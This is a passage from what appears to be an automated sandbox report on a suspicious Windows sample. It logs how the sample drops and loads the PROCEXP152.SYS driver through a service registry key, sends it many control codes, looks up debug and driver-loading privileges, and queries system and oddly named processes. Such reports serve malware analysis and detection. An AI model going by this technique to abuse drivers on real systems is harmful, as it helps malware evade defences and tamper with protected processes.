| shlwapi.dll | 0x7ff8edfe0000 | 0x7ff8ee030fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ff8ee150000 | 0x7ff8ee185fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
File (16)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | \\.\PROCEXP152 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \\.\Global\PROCEXP152 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Windows\system32\Drivers\PROCEXP152.SYS | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \\.\PROCEXP152 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Windows\system32\Drivers\PROCEXP152.SYS | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Windows\system32\Drivers\PROCEXP152.SYS | size = 32768 |
|
1 | |
| Write | C:\Windows\system32\Drivers\PROCEXP152.SYS | size = 1560 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 29 |
|
1 | |
| Delete | C:\Windows\system32\Drivers\PROCEXP152.SYS | - |
|
1 |
Registry (13)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Create Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | value_name = Type, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | value_name = ErrorControl, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | value_name = Start, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | value_name = ImagePath, data = \??\C:\Windows\system32\Drivers\PROCEXP152.SYS, size = 92, type = REG_SZ |
|
1 | |
| Delete Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152\Enum | - |
|
1 | |
| Delete Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152\Security | - |
|
1 | |
| Delete Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | - |
|
1 |
Process (119)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | c:\windows\system32\conhost.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
6 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
6 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\syswow64\wscript.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | System | desired_access = PROCESS_DUP_HANDLE |
|
5 | |
| Open | System | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\uni-likely-strap.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\turkey.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows mail\comfortable_welsh.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\immediate.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla firefox\unlimited-victims.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows photo viewer\dishes neither nepal.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\tenant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\momentum.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows nt\pharmaceutical photoshop.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows multimedia platform\song_biz_boats.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\tramadol_operates_statute.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\reference assemblies\batteries dirty.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\mad.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\downloadedrack.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\reference assemblies\command.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\microsoft.net\abortionauditordirectors.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\romance.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\markets-represented-quarterly.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\properly.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows portable devices\publisherfunnydownloaded.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\audiodg.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\cary.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\nwi6lhb5.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\wscript.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cacls.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cacls.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 |
Module (72)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ff8ee2d0000 |
|
2 | |
| Get Handle | c:\windows\system32\ntdll.dll | base_address = 0x7ff8ee380000 |
|
17 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmn~1\appdata\local\temp\g13k6qzj64.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x7ff8ee2f02a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x7ff8ee2f23f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x7ff8ee2e63c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x7ff8ee2ed920 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x7ff8ee2f5620 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x7ff8ee2f5580 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x7ff8ee2f55e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7ff8ee2f0e10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7ff8ee2ef110 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7ff8ee3bcb10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7ff8ee3c5790 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7ff8ee3bea10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7ff8ee2f28c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x7ff8ee3bc470 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7ff8ee3c5410 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x7ff8ee4142f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7ff8ee3f95e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x7ff8ee413130 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7ff8ee2f0fb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7ff8ee312720 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7ff8eb92e7a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7ff8ee3128e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7ff8ee2e6010 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7ff8ee312a00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7ff8ee2f0310 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7ff8ee312bc0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7ff8ee2f25d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7ff8ee312cd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7ff8ee2e6000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7ff8eb8c45e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7ff8ee2e65a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x7ff8ee2ee960 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtLoadDriver, address_out = 0x7ff8ee414490 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlInitUnicodeString, address_out = 0x7ff8ee39f0d0 |
|
2 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationProcess, address_out = 0x7ff8ee4136d0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationThread, address_out = 0x7ff8ee413790 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySystemInformation, address_out = 0x7ff8ee4138a0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySymbolicLinkObject, address_out = 0x7ff8ee414980 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryDirectoryObject, address_out = 0x7ff8ee4147f0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtOpenSymbolicLinkObject, address_out = 0x7ff8ee4146c0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtOpenDirectoryObject, address_out = 0x7ff8ee413ac0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryObject, address_out = 0x7ff8ee413640 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySection, address_out = 0x7ff8ee413a50 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlInitAnsiString, address_out = 0x7ff8ee3e5d30 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlAnsiStringToUnicodeString, address_out = 0x7ff8ee3a36a0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlFreeUnicodeString, address_out = 0x7ff8ee3a7110 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlFreeAnsiString, address_out = 0x7ff8ee3a7110 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlUnicodeStringToAnsiString, address_out = 0x7ff8ee3a3dc0 |
|
1 |
Driver (286)
| Operation | Driver | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | \??\C:\Windows\system32\Drivers\PROCEXP152.SYS | - |
|
1 | |
| Control | \\.\PROCEXP152 | control_code = 0x83350048 |
|
203 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335004c |
|
4 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335003c |
|
8 | |
| Control | \\.\PROCEXP152 | control_code = 0x83350014 |
|
5 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335000c |
|
65 |
User (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Lookup Privilege | privilege = SeLoadDriverPrivilege, luid = 10 |
|
1 |
System (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Get Info | - |
|
7 | |
| Get Info | - |
|
1 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
6 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Operating System |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #52: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #52 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:12, Reason: Child Process |
| Unmonitor | End Time: 00:02:24, Reason: Self Terminated |
| Monitor Duration | 00:00:12 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdac |
| Parent PID | 0xe18 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FD4
0x
B5C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x008a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x00a30fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a40000 | 0x00a40000 | 0x01e3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001f30000 | 0x01f30000 | 0x01f3ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74680000 | 0x74711fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
